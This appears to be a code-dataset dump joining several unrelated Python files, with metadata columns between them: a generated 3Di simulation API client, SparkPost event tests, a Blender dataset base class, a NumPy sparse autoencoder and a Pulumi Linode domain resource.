query_params.append(('created__date__lt', local_var_params['created__date__lt'])) # noqa: E501
if 'created__date__lte' in local_var_params and local_var_params['created__date__lte'] is not None: # noqa: E501
query_params.append(('created__date__lte', local_var_params['created__date__lte'])) # noqa: E501
if 'created__year' in local_var_params and local_var_params['created__year'] is not None: # noqa: E501
query_params.append(('created__year', local_var_params['created__year'])) # noqa: E501
if 'created__year__gt' in local_var_params and local_var_params['created__year__gt'] is not None: # noqa: E501
query_params.append(('created__year__gt', local_var_params['created__year__gt'])) # noqa: E501
if 'created__year__gte' in local_var_params and local_var_params['created__year__gte'] is not None: # noqa: E501
query_params.append(('created__year__gte', local_var_params['created__year__gte'])) # noqa: E501
if 'created__year__lt' in local_var_params and local_var_params['created__year__lt'] is not None: # noqa: E501
query_params.append(('created__year__lt', local_var_params['created__year__lt'])) # noqa: E501
if 'created__year__lte' in local_var_params and local_var_params['created__year__lte'] is not None: # noqa: E501
query_params.append(('created__year__lte', local_var_params['created__year__lte'])) # noqa: E501
if 'created__month' in local_var_params and local_var_params['created__month'] is not None: # noqa: E501
query_params.append(('created__month', local_var_params['created__month'])) # noqa: E501
if 'created__month__lte' in local_var_params and local_var_params['created__month__lte'] is not None: # noqa: E501
query_params.append(('created__month__lte', local_var_params['created__month__lte'])) # noqa: E501
if 'created__day' in local_var_params and local_var_params['created__day'] is not None: # noqa: E501
query_params.append(('created__day', local_var_params['created__day'])) # noqa: E501
if 'created__day__lt' in local_var_params and local_var_params['created__day__lt'] is not None: # noqa: E501
query_params.append(('created__day__lt', local_var_params['created__day__lt'])) # noqa: E501
if 'simulation__threedimodel__id' in local_var_params and local_var_params['simulation__threedimodel__id'] is not None: # noqa: E501
query_params.append(('simulation__threedimodel__id', local_var_params['simulation__threedimodel__id'])) # noqa: E501
if 'simulation__threedimodel__id__range' in local_var_params and local_var_params['simulation__threedimodel__id__range'] is not None: # noqa: E501
query_params.append(('simulation__threedimodel__id__range', local_var_params['simulation__threedimodel__id__range'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def simulation_templates_read(self, id, **kwargs): # noqa: E501
"""simulation_templates_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_read(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Template
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulation_templates_read_with_http_info(id, **kwargs) # noqa: E501
def simulation_templates_read_with_http_info(self, id, **kwargs): # noqa: E501
"""simulation_templates_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulation_templates_read_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this template. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Template, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulation_templates_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `simulation_templates_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulation_templates/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Template', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def simulations_clone(self, id, **kwargs): # noqa: E501
"""Clone the simulation. # noqa: E501
Clones the simulation in a runnable state, only events & initials. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_clone(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this simulation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Simulation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulations_clone_with_http_info(id, **kwargs) # noqa: E501
def simulations_clone_with_http_info(self, id, **kwargs): # noqa: E501
"""Clone the simulation. # noqa: E501
Clones the simulation in a runnable state, only events & initials. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_clone_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this simulation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Simulation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulations_clone" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `simulations_clone`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulations/{id}/clone/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Simulation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def simulations_from_template(self, data, **kwargs): # noqa: E501
"""Create a (new/cloned) simulation from a simulation template. # noqa: E501
There are two options to specify the desired duration for the new simulation, either by using the ``end_datetime`` **or** the ``duration`` parameter. { \"template\": # source simulation template resource id \"name\": # name for the new simulation. \"tags\": # extra tags, added to existing simulation template tags. \"organisation\": # uuid of the organisation for which the simulation is run \"start_datetime\": # datetime (in ISO 8601 (UTC) format) for the simulation start, e.g. \"YYYY-MM-DDThh:mm:ss\" \"end_datetime\": # datetime (in ISO 8601 (UTC) format) for the simulation end, e.g. \"YYYY-MM-DDThh:mm:ss\" \"duration\": # in seconds, can be used instead of end_datetime \"clone_events\": # if true, clone events like rain/sources & sinks etc. \"clone_initials\": # if true, clone initial waterlevels \"clone_settings\": # if true, clone simulation settings, like physical settings etc. } # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_from_template(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param FromTemplate data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Simulation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.simulations_from_template_with_http_info(data, **kwargs) # noqa: E501
def simulations_from_template_with_http_info(self, data, **kwargs): # noqa: E501
"""Create a (new/cloned) simulation from a simulation template. # noqa: E501
There are two options to specify the desired duration for the new simulation, either by using the ``end_datetime`` **or** the ``duration`` parameter. { \"template\": # source simulation template resource id \"name\": # name for the new simulation. \"tags\": # extra tags, added to existing simulation template tags. \"organisation\": # uuid of the organisation for which the simulation is run \"start_datetime\": # datetime (in ISO 8601 (UTC) format) for the simulation start, e.g. \"YYYY-MM-DDThh:mm:ss\" \"end_datetime\": # datetime (in ISO 8601 (UTC) format) for the simulation end, e.g. \"YYYY-MM-DDThh:mm:ss\" \"duration\": # in seconds, can be used instead of end_datetime \"clone_events\": # if true, clone events like rain/sources & sinks etc. \"clone_initials\": # if true, clone initial waterlevels \"clone_settings\": # if true, clone simulation settings, like physical settings etc. } # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.simulations_from_template_with_http_info(data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param FromTemplate data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Simulation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method simulations_from_template" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `simulations_from_template`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/simulations/from_template/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Simulation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 54.070514
| 1,186
| 0.632819
| 36,036
| 316,691
| 5.199134
| 0.011544
| 0.057217
| 0.094451
| 0.03322
| 0.976857
| 0.965403
| 0.948478
| 0.932919
| 0.927069
| 0.915834
| 0
| 0.016686
| 0.293179
| 316,691
| 5,856
| 1,187
| 54.079747
| 0.820308
| 0.397649
| 0
| 0.685514
| 0
| 0
| 0.266465
| 0.123453
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025761
| false
| 0
| 0.001673
| 0
| 0.053195
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f171d27ba3c224d6b008c063fa275e2b5abe8eeb
| 102
|
py
|
Python
|
build.py
|
Nepmia/N4-Framework
|
84d98f3fe05ca02f938332e5970bca5482ef8ce7
|
[
"MIT"
] | null | null | null |
build.py
|
Nepmia/N4-Framework
|
84d98f3fe05ca02f938332e5970bca5482ef8ce7
|
[
"MIT"
] | null | null | null |
build.py
|
Nepmia/N4-Framework
|
84d98f3fe05ca02f938332e5970bca5482ef8ce7
|
[
"MIT"
] | null | null | null |
from template_handler import template_builder, templates_lister
template_builder(templates_lister())
| 25.5
| 63
| 0.882353
| 12
| 102
| 7.083333
| 0.583333
| 0.352941
| 0.564706
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068627
| 102
| 4
| 64
| 25.5
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f174753cba9198ba54b664cbc54c27b45c67aedf
| 1,699
|
py
|
Python
|
test/test_events.py
|
klevio/python-sparkpost
|
007fb26ff5d046a639a88273265fd0775573a8e2
|
[
"Apache-2.0"
] | null | null | null |
test/test_events.py
|
klevio/python-sparkpost
|
007fb26ff5d046a639a88273265fd0775573a8e2
|
[
"Apache-2.0"
] | null | null | null |
test/test_events.py
|
klevio/python-sparkpost
|
007fb26ff5d046a639a88273265fd0775573a8e2
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import responses
from sparkpost import SparkPost
from sparkpost.exceptions import SparkPostAPIException
@responses.activate
def test_success_events_message():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/message',
status=200,
content_type='application/json',
body='{"results": []}'
)
sp = SparkPost('fake-key')
results = sp.events.message.list()
assert results == []
@responses.activate
def test_fail_events_message():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/message',
status=500,
content_type='application/json',
body="""
{"errors": [{"message": "You failed", "description": "More Info"}]}
"""
)
with pytest.raises(SparkPostAPIException):
sp = SparkPost('fake-key')
sp.events.message.list()
@responses.activate
def test_success_events_ingest():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/ingest',
status=200,
content_type='application/json',
body='{"results": []}'
)
sp = SparkPost('fake-key')
results = sp.events.ingest.list()
assert results == []
@responses.activate
def test_fail_events_ingest():
responses.add(
responses.GET,
'https://api.sparkpost.com/api/v1/events/ingest',
status=500,
content_type='application/json',
body="""
{"errors": [{"message": "You failed", "description": "More Info"}]}
"""
)
with pytest.raises(SparkPostAPIException):
sp = SparkPost('fake-key')
sp.events.ingest.list()
| 25.742424
| 75
| 0.616245
| 179
| 1,699
| 5.759777
| 0.240223
| 0.075655
| 0.077595
| 0.093113
| 0.865179
| 0.865179
| 0.805044
| 0.805044
| 0.805044
| 0.71775
| 0
| 0.012308
| 0.234844
| 1,699
| 65
| 76
| 26.138462
| 0.780769
| 0
| 0
| 0.714286
| 0
| 0
| 0.283696
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74cf486be57b08845c988fa34b7e4ba6f1addeac
| 2,024
|
py
|
Python
|
render/dataset.py
|
VCL3D/BlenderScripts
|
d9671801d2a7686226c9fcf297d89a4388158733
|
[
"MIT"
] | 11
|
2021-05-11T17:26:59.000Z
|
2022-03-25T08:13:59.000Z
|
render/dataset.py
|
VCL3D/BlenderScripts
|
d9671801d2a7686226c9fcf297d89a4388158733
|
[
"MIT"
] | null | null | null |
render/dataset.py
|
VCL3D/BlenderScripts
|
d9671801d2a7686226c9fcf297d89a4388158733
|
[
"MIT"
] | 2
|
2021-05-15T01:56:01.000Z
|
2021-05-15T13:49:57.000Z
|
class Dataset(object):
def __init__(self, name=None):
self.name = name
def __str__(self):
return self.name
def get_instance_name(self, filepath, id):
raise NotImplementedError("Abstract class")
def import_model(self, filepath):
raise NotImplementedError("Abstract class")
def get_camera_position(self, filepath):
raise NotImplementedError("Abstract class")
def get_camera_position_generator(self, folder):
raise NotImplementedError("Abstract class")
def get_camera_rotation(self, degrees = 0):
raise NotImplementedError("Abstract class")
def get_camera_offset(self, direction, distance, degrees):
raise NotImplementedError("Abstract class")
def get_depth_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_color_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_emission_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_normals_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_normal_map_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_flow_map_output(self, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_semantic_map_output(self, labels_path, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def get_pretty_semantic_map_output(self, labels_path, output_path, base_filename, nodes, links, compositor):
raise NotImplementedError("Abstract class")
def set_render_settings(self):
raise NotImplementedError("Abstract class")
| 36.142857
| 112
| 0.727767
| 227
| 2,024
| 6.220264
| 0.215859
| 0.254958
| 0.339943
| 0.393059
| 0.796034
| 0.767705
| 0.737252
| 0.667847
| 0.667847
| 0.667847
| 0
| 0.000608
| 0.187747
| 2,024
| 56
| 113
| 36.142857
| 0.858273
| 0
| 0
| 0.428571
| 0
| 0
| 0.103704
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.485714
| false
| 0
| 0.028571
| 0.028571
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
74ff594067bdd8576d190e8ee173e971d106f8d2
| 151
|
py
|
Python
|
src/test_only_plugins/heroku/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/heroku/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_only_plugins/heroku/__init__.py
|
FelixSchwarz/sentry
|
7c92c4fa2b6b9f214764f48c82594acae1549e52
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from test_only_plugins.base import assert_package_not_installed
assert_package_not_installed("sentry-heroku")
| 25.166667
| 63
| 0.887417
| 21
| 151
| 5.761905
| 0.666667
| 0.214876
| 0.264463
| 0.413223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072848
| 151
| 5
| 64
| 30.2
| 0.864286
| 0
| 0
| 0
| 0
| 0
| 0.086093
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
7453a9a6d1aed9afe01f4c3b0e9f32ef46080879
| 4,175
|
py
|
Python
|
src/sparse_autoencoder.py
|
jihunhamm/MinimaxFilter
|
fa9ee7aa126cbf651c4c9cbf076e4ba848fcfc46
|
[
"Apache-2.0"
] | 10
|
2017-05-25T20:14:26.000Z
|
2019-07-08T12:20:17.000Z
|
src/sparse_autoencoder.py
|
jihunhamm/MinimaxFilter
|
fa9ee7aa126cbf651c4c9cbf076e4ba848fcfc46
|
[
"Apache-2.0"
] | null | null | null |
src/sparse_autoencoder.py
|
jihunhamm/MinimaxFilter
|
fa9ee7aa126cbf651c4c9cbf076e4ba848fcfc46
|
[
"Apache-2.0"
] | 7
|
2016-12-29T16:57:20.000Z
|
2020-01-19T00:59:23.000Z
|
import numpy as np
def sigmoid(x):
indp = np.where(x>=0)
indn = np.where(x<0)
tx = np.zeros(x.shape)
tx[indp] = 1./(1.+np.exp(-x[indp]))
tx[indn] = np.exp(x[indn])/(1.+np.exp(x[indn]))
return tx
def sigmoid_prime(x):
return sigmoid(x) * (1 - sigmoid(x))
def KL_divergence(x, y):
return x * (np.log(x+1E-20)-np.log(y+1E-20)) + (1 - x) * (np.log(1 - x+1E-20) - np.log(1 - y+1E-20))
def initialize(hidden_size, visible_size):
r = np.sqrt(6) / np.sqrt(hidden_size + visible_size + 1)
W1 = np.random.random((hidden_size, visible_size)) * 2 * r - r
W2 = np.random.random((visible_size, hidden_size)) * 2 * r - r
b1 = np.zeros(hidden_size, dtype=np.float64)
b2 = np.zeros(visible_size, dtype=np.float64)
theta = np.concatenate((W1.reshape(hidden_size * visible_size),
W2.reshape(hidden_size * visible_size),
b1.reshape(hidden_size),
b2.reshape(visible_size)))
return theta
def sparse_autoencoder_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
m = data.shape[1]
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = sigmoid(z3)
cost = np.sum((h - data) ** 2) / (2 * m) + \
(lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2))# + \
sparsity_delta = 0
delta3 = -(data - h) * sigmoid_prime(z3)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
def sparse_autoencoder(theta, hidden_size, visible_size, data):
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
m = data.shape[1]
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
return a2
def sparse_autoencoder_linear_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
m = data.shape[1]
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = z3
cost = np.sum((h - data) ** 2) / (2 * m) + \
(lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2))
sparsity_delta = 0.
delta3 = -(data - h)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
| 34.504132
| 108
| 0.597126
| 593
| 4,175
| 4.028668
| 0.116358
| 0.175806
| 0.199247
| 0.246128
| 0.763499
| 0.735036
| 0.70992
| 0.70992
| 0.70992
| 0.70992
| 0
| 0.049871
| 0.255569
| 4,175
| 120
| 109
| 34.791667
| 0.71879
| 0.000719
| 0
| 0.5875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0875
| false
| 0
| 0.0125
| 0.025
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
745b13c98a95ca002fe9fae1e0e136c01d2110e0
| 41,127
|
py
|
Python
|
sdk/python/pulumi_linode/domain.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2019-05-02T21:14:37.000Z
|
2021-12-19T18:37:40.000Z
|
sdk/python/pulumi_linode/domain.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 79
|
2019-05-01T17:52:03.000Z
|
2022-03-31T15:31:56.000Z
|
sdk/python/pulumi_linode/domain.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2019-05-02T00:37:23.000Z
|
2021-05-04T11:10:40.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['DomainArgs', 'Domain']
@pulumi.input_type
class DomainArgs:
def __init__(__self__, *,
domain: pulumi.Input[str],
type: pulumi.Input[str],
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Domain resource.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
